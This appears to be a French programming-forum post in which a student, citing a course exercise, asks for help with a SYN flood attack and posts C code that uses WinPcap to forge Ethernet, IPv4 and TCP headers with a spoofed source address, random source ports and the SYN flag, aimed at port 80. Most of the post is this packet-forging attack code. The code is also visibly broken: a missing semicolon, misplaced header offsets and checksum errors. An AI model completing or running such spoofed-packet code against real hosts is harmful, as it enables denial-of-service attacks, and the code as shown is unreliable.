Discussion :

[halil.zakaria]

Bonjour,
dans le cadre d'un exercice,je suis sensé implémenté une attaque SYN flood,
j'ai pas adopté les raw sockets parceque mon windows 7 refuse de les implementer sous visual c++ 6.0,j'ai eu recours à PCAP,et ça fonctionne(pas la paine de le verifier le code PCAP),mais j'aurais plus de travail comme je dois monter la trame ethernet contrairement au RAW sockets,avec pcap j'arrive à envoyer du charabiat,donc je suis bloqué dans la structuration des entetes.voici mon code c'est mal organisé je sais

voilà pour réussir cette attaque je dois forger mes connections TCP avec des adresses ip sources non active et des ports sources divers.mais pour commencer je me concentre pour réussir une seule communication forgée après je travaillerai sur le nombre.
Entetes,et prototypes:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
 
#include <stdlib.h>
#include <stdio.h>
#include <time.h>
#include <pcap.h>
#include <iostream>
#include <fstream>
using namespace std; 
typedef unsigned short u16;
typedef unsigned long u32;
 
u16 ip_sum_calc(u16 len_ip_header, u16 buff[])
{
u16 word16;
u32 sum=0;
u16 i;
    // make 16 bit words out of every two adjacent 8 bit words in the packet
   // and add them up
for (i=0;i<len_ip_header;i=i+2)
            {
		word16 =((buff[i]<<8)&0xFF00)+(buff[i+1]&0xFF);
		sum = sum + (u32) word16;	
	}
 
   // take only 16 bits out of the 32 bit sum and add up the carries
	while (sum>>16)
	  sum = (sum & 0xFFFF)+(sum >> 16);
 
	// one's complement the result
	sum = ~sum;
 
return ((u16) sum);
}
 
typedef struct ip_hdr 
{           unsigned char ip_header_len:4; // 4-bit header length (in 32-bit words) normally=5 (Means 20 Bytes may be 24 also) 
	unsigned char ip_version :4;   // 4-bit IPv4 version 
	unsigned char ip_tos;          // IP type of service 
	unsigned short ip_total_length; // Total length 
	unsigned short ip_id;    // Unique identifier  
 
unsigned char ip_frag_offset :5; // Fragment offset field beside flags 
unsigned char ip_more_fragment :1; 
unsigned char ip_dont_fragment :1; 
unsigned char ip_reserved_zero :1; 
unsigned char ip_frag_offset1; //fragment offset 
 
unsigned char ip_ttl;         // Time to live  
unsigned char ip_protocol; // Protocol(TCP,UDP etc)   
unsigned short ip_checksum;    // IP checksum 
unsigned long ip_srcaddr;       // Source address 
unsigned long ip_destaddr;      // Source address 
} IPV4_HDR, *PIPV4_HDR, FAR * LPIPV4_HDR;   
 
// TCP header
 typedef struct tcp_header 
 { unsigned short source_port;   // source port 
 unsigned short dest_port;     // destination port 
 unsigned int sequence;        // sequence number - 32 bits 
 unsigned int ackn owledge;     // acknowledgement number - 32 bits   
 unsigned char ns :1;          //Nonce Sum Flag Added in RFC 3540. 
 unsigned char reserved_part1:3; //according to rfc 
 unsigned char data_offset:4;    /*The number of 32-bit words in the TCP header. This indicates where the data begins. The length of the TCP header is always a multiple of 32 bits.*/  
 unsigned char fin :1; //Finish Flag 
 unsigned char syn :1; //Synchronise Flag 
 unsigned char rst :1; //Reset Flag 
 unsigned char psh :1; //Push Flag 
 unsigned char ack :1; //Acknowledgement Flag 
 unsigned char urg :1; //Urgent Flag   
 unsigned char ecn :1; //ECN-Echo Flag 
 unsigned char cwr :1; //Congestion Window Reduced Flag   ////////////////////////////////   
 unsigned short window; // window 
 unsigned short checksum; // checksum 
 unsigned short urgent_pointer; // urgent pointer
 } TCP_HDR , *PTCP_HDR , FAR * LPTCP_HDR , TCPHeader , TCP_HEADER; 
 
 
///////////////////////////////////////////////Ethernet Header  
typedef struct ethernet_header  
{  
UCHAR dest[6]; //Total 48 bits  
UCHAR source[6]; //Total 48 bits  
USHORT type; //16 bits  
}ETHER_HDR , *PETHER_HDR , FAR * LPETHER_HDR , ETHERHeader;

je me demande si je dois calculer le CRC de la trame Ethernet??
voiçi la main():

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
 
#include "header.h"
main()
{
pcap_if_t *alldevs;
pcap_if_t *d;
int inum;
int i=0;
pcap_t *adhandle;
char errbuf[PCAP_ERRBUF_SIZE];
u_char buf[1000];
memset (buf, 0, 1000);
///////////////////////////////////////////////////Read Ethernet Header
 
 
 
    /* Retrieve the device list on the local machine */
    if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
    {
        fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }
 
    /* Print the list */
    for(d=alldevs; d; d=d->next)
    {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }
 
    if(i==0)
    {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return -1;
    }
 
    printf("Enter the interface number (1-%d):",i);
    scanf("%d", &inum);
 
if(inum < 1 || inum > i)
    {
        printf("\nInterface number out of range.\n");
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return -1;
    }
 
    /* Jump to the selected adapter */
    for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* Open the output device */
    if ( (adhandle= pcap_open(d->name,            // name of the device
                        100,                // portion of the packet to capture (only the first 100 bytes)
                        PCAP_OPENFLAG_PROMISCUOUS,  // promiscuous mode
                        1000,               // read timeout
                        NULL,               // authentication on the remote machine
                        errbuf              // error buffer
                        ) ) == NULL)
    {
        fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
        return -1;
 
 
}
 
 
 
 
 
ETHER_HDR *ether_hdr=NULL;
IPV4_HDR *v4hdr=NULL; 
TCP_HDR *tcphdr=NULL;
 
ether_hdr=(ETHER_HDR*)buf;
ether_hdr->dest[0]=0x08;
ether_hdr->dest[1]=0x76;
ether_hdr->dest[2]=0xff;
ether_hdr->dest[3]=0x72;
ether_hdr->dest[4]=0x80;
ether_hdr->dest[5]=0xad;
ether_hdr->source[0]=0x00;
ether_hdr->source[1]=0x21;
ether_hdr->source[2]=0x5D;
ether_hdr->source[3]=0xDB;
ether_hdr->source[4]=0x80;
ether_hdr->source[5]=0x12;
ether_hdr->type=htons(0x0800);
 
v4hdr =(IPV4_HDR *)&buf[sizeof(ETHER_HDR)]; //lets point to the ip header portion 
v4hdr->ip_header_len=5;
v4hdr->ip_version=4; 
v4hdr->ip_tos = 0; 
 
v4hdr->ip_total_length = htons ( sizeof(IPV4_HDR) + sizeof(TCP_HDR) ); 
v4hdr->ip_id = htons(45678);
 
v4hdr->ip_frag_offset = 0; 
v4hdr->ip_frag_offset1 = 0; 
v4hdr->ip_reserved_zero = 0; 
v4hdr->ip_dont_fragment = 1; 
v4hdr->ip_more_fragment = 0;
v4hdr->ip_ttl =255;
//v4hdr->ip_protocol = IPPROTO_TCP; 
v4hdr->ip_protocol = 6;
v4hdr->ip_checksum = 0;
v4hdr->ip_srcaddr = inet_addr("192.168.1.245"); 
v4hdr->ip_destaddr = inet_addr("123.123.123.123");
 
 
v4hdr->ip_checksum=ip_sum_calc(sizeof(IPV4_HDR),(u16*)&buf);
 
tcphdr = (TCP_HDR *)&buf[sizeof(IPV4_HDR)]; //get the pointer to the tcp header in the packet 
tcphdr->source_port = htons((rand() % 65535 + 1));
tcphdr->dest_port = htons(80); 
tcphdr->sequence=0;
tcphdr->data_offset=sizeof(TCP_HDR) / 4;
tcphdr->cwr=0; 
tcphdr->ecn=0; 
tcphdr->urg=0; 
tcphdr->ack=0; 
tcphdr->psh=0; 
tcphdr->rst=0; 
tcphdr->syn=1; 
tcphdr->fin=0; 
tcphdr->ns=1; 
tcphdr->checksum = 0;
 
tcphdr->checksum=ip_sum_calc(sizeof(TCP_HDR),(u16*)&buf)
 
 
 
 
  if (pcap_sendpacket(adhandle, buf, sizeof(TCP_HDR)+sizeof(IPV4_HDR)+sizeof(ETHER_HDR) /* size */) != 0)
    {
        fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle));
        return -1;
    }
 
 
}

voilà çi joint une capture de ma trame forgée.remarquez que certains champs sont faux.